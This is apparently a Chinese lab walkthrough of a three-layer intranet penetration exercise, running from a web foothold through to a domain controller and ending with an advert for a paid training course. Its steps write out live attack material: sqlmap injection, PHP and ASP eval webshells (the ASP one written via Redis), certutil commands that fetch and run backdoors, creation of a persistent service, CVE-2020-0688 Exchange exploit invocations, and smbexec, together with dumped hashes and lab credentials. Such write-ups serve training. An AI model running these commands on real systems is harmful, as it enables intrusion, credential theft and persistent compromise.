moonsec
1. 概述 1
2. 靶场搭建 2
3. 外网打点 5
3.1. SQLMAP注入得到账号和密码 5
3.2. 修改配置文件拿webshell 6
3.3. 提权宝塔系统 6
3.4. frp反向代理突破登录 9
4. 内网渗透 10
4.1. 主机信息收集 11
4.2. 横向渗透 11
4.3. 跨网段扫描 12
4.4. hydra爆破redis 12
4.5. redis windows写shell 12
4.6. answrod连接shell 13
4.7. 信息收集redis 服务器信息 14
4.8. PrintSpoofer提权server2012 15
4.9. 下载metasploist正向后门收集信息 15
4.10. 设置服务方式启动后门 15
4.11. 设置windwos防火墙开放8899端口 15
4.12. metasploit正向连接后门 16
4.13. outlook查看邮件 18
5. 跨网段内网渗透 18
5.1. CVE-2020-0688 攻击exchange 20
5.2. 获取dc下的root 21
5.3. 通过smbexec登录域控 22
1概述
暗月实战项目十一是从外网打点到内网再到域控,是三层网络,目标是反向代理到内网访问,通过这个WEB点的信息获取源码,再到审计突破,再到内网。到了内网通过横向移动发现更多主机,通过信息整理得到工作组边界设备的权限,再通过exchange漏洞获取核心区域访问权限,再拿下域控权限。
主要技术应用:
基础的php代码审计、win系统的宝塔系统提权、cs或者msf实战渗透环境(vps一台)、shellcode免杀过火绒、内网漫游、三层网络、redis windows 写shell
windwos防火墙配置(主要是会开端口和端口转发)、代理隧道应用,exchange漏洞命令执行,打域控技巧。
2靶场搭建
12server-bt和12server-redis是nat模式。
外网准备一台vps系统可以是win也可以是linux要装有frp服务
在12server-bt配置frp
[common]
server_addr= 你的vpsIP
server_port= 7788
token=moonsec9999
[web]
type= tcp
local_ip= 127.0.0.1
local_port= 80
remote_port= 80
绑定hosts
C:WindowsSystem32driversetchosts
你的vps www.cocat.cc
3外网打点
3.1 SQLMAP注入得到账号和密码
POST/kss_inc/payapi_return2.php HTTP/1.1Host:www.cocat.ccUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101Firefox/88.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding:gzip, deflateConnection:closeCookie:ZDEDebuggerPresent=php,phtml,php3; loginimg=A1IIHQlPVwU%3D;loginimg_ver=1c6e1ea86bf5d4fa16f40d540fc3de9eUpgrade-Insecure-Requests:1Cache-Control:max-age=0Content-Type:application/x-www-form-urlencodedContent-Length:94
v_oid=K60722174137712560Dh4iW1&v_pstatus=20&v_amount=1&v_moneytype=1&remark1=1&v_md5str=121212sqlmap-r sql.txt --dbms mysql -v 1 -p v_oid --dump -C "username,password"-D www_cocat_cc -T kss_tb_manager
破解得moon@123
3.2 修改配置文件拿webshell
moo');eval($_POST[cmd]);//
3.3 提权宝塔系统
禁用函数
passthru,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,putenv,exec 查看配置文件获取密码
宝塔的登录密码C:/BtSoft/panel/data/default.pl jSKyFFdj
宝塔的登录端口C:/BtSoft/panel/data/port.pl8888
宝塔的登录网址路径C:/BtSoft/panel/data/admin_path.pl/e1VOsmtO
C:/BtSoft/panel/data/default.db
sqlite数据库打开即可
账号gOXZQjWA密码jSKyFFdj登录http://localhost:8888/e1VOsmtO
扫描端口
nmap -sT -A 154.194.2.139
只开放了22和80端口
查看本地开放端口
访问8888端口
echo file_get_contents('http://localhost:8888/e1VOsmtO/')
能访问登录页面但是登录不了。
3.4 frp反向代理突破登录
当前站点是反向代理出去的,所以可以考虑能不能修改配置文件。
[8080]type= tcplocal_ip= 127.0.0.1local_port= 8888remote_port= 8888
可以看到文件是能修改,所以当管理重新执行的时候,就能通过8888端口访问宝塔的系统的8888端口。
登录宝塔系统
这个后门还要过火绒的。随便找了以前那些资源生成了一个后门。然后在宝塔任务执行。
4内网渗透
4.1主机信息收集
hashdumpAdministrator:500:aad3b435b51404eeaad3b435b51404ee:de935c6087ec367d3ef786915a4edcce:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::mysql:1002:aad3b435b51404eeaad3b435b51404ee:291376866817cf2ccfe198308e5f925b:::www:1001:aad3b435b51404eeaad3b435b51404ee:894f353e870620b186a9a46ce56ac8f1:::
loadmimikatzloadkiwimsvIP 192.168.59.133
4.2 横向渗透
run post/windows/gather/arp_scanner rhosts=192.168.59.0/24
4.3 跨网段扫描
在session执行绑定静态路由
run autoroute -s 192.168.59.0/24backgrounduse auxiliary/server/socks4arun
修改配置文件vi/etc/proxychains.conf
添加socks4 127.0.0.1 1080
代理nmap扫描
proxychains nmap -sT -Pn 192.168.59.4 -p80,89,8000,9090,1433,1521,3306,5432,445,135,443,873,5984,6379,7001,7002,9200,9300,11211,27017,27018,50000,50070,50030,21,22,23,2601,3389
4.4 hydra爆破redis
proxychainshydra -P /home/kali/cncat/top100_cn.txt redis://192.168.59.4 -t 1 -ossh.txt -v
4.5 redis windows写shell
proxychains redis-cli -h 192.168.59.4auth123456789qqconfig set dir C:/inetpub/wwwrootsetxxx "nnn<%eval request("cmd")%>nnn"config set dbfilename shell.aspsavequit
访问shell
4.6 answrod连接shell
修改proxychanis.conf连接
4.7 信息收集redis服务器信息
发现存在两个段
当前权限也是很低
4.8 PrintSpoofer提权server2012
把PrintSpoofer上传到C:ProgramData
C:ProgramDatamoonsec.exe-i -c "whoami"
4.9 下载metasploist正向后门收集信息
因为reids主机是出不了网的所以要将后门放在宝塔上的80端口,同样也要过火绒。
certutil -urlcache -split -f http://192.168.59.133/8899.exe 8899.exe
4.10 设置服务方式启动后门
注意双引号转义
moonsec.exe -i -c "sc create "server power" binpath="C:ProgramData8899.exe""moonsec.exe -i -c "sc description "server power""description""moonsec.exe -i -c "sc config "server power" start= auto"
启动后门
moonsec.exe -i -c "net start "server power""
4.11 设置windwos防火墙开放8899端口
因为有防火墙拦截先添加一个8899端口
netshfirewall add portopening tcp 8899 msf
4.12 metasploit正向连接后门
use exploit/multi/handlersetp ayload windows/meterpreter/bind_tcpsetR HOST 192.168.59.4setl port 8899exploit
启动后门
moonsec.exe -i -c "net start "server power""
这里有一个bug连上之后个几分钟就自动退出了。所以连接后马上迁移进程防止失去连接。
扫描10段的主机发现存在201和209
4.13 outlook查看邮件
导出outlook文件C:UsersAdministratorDocumentsOutlook文件
从outlook获取信息moonsec的密码是QQqq5201314
5跨网段内网渗透
添加路由
run autoroute -s 10.10.10.0/24proxychains nmap -sT 10.10.10.209 -p80,89,8000,9090,1433,1521,3306,5432,445,135,443,873,5984,6379,7001,7002,9200,9300,11211,27017,27018,50000,50070,50030,21,22,23,2601,3389
访问443端口是一个exchange
域控应该是cncatmoonsecQQqq5201314
登录成功。
查看所有用户。
5.1 CVE-2020-0688 攻击exchange
下载后门文件到exchange
CVE-2020-0688_EXP.py -s https://10.10.10.209 -u cncatmoonsec -p QQqq5201314 -c "cmd/c certutil -urlcache -split -f http://10.10.10.202/4444.exec:/4444.exe"
CVE-2020-0688_EXP.py -s https://10.10.10.209 -u cncatmoonsec -p QQqq5201314 -c "cmd/c netsh firewall add portopening tcp 8899 msf"CVE-2020-0688_EXP.py -s https://10.10.10.209 -u cncatmoonsec -p QQqq5201314 -c "cmd/c c:/4444.exe"
5.2 获取dc下的root
type \10.10.10.201c$usersadministratorroot.txt
dcsync administrator 获取hash
知道了密码就可以通过代理对域控进行命令执行了。这里有空再说了。
5.3 通过smbexec登录域控
proxychains python3 smbexec.py cncat/administrator:QWEasd123@10.10.10.201
6培训
项目十一 cncat
已经录制好课程有配套的工具
欢迎加入暗月全栈渗透培训观看和学习
培训咨询微信
扫一扫添加好友
微信公众号
本文始发于微信公众号(阿乐你好):【项目十一】从外网打点到内网域实战cncat
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论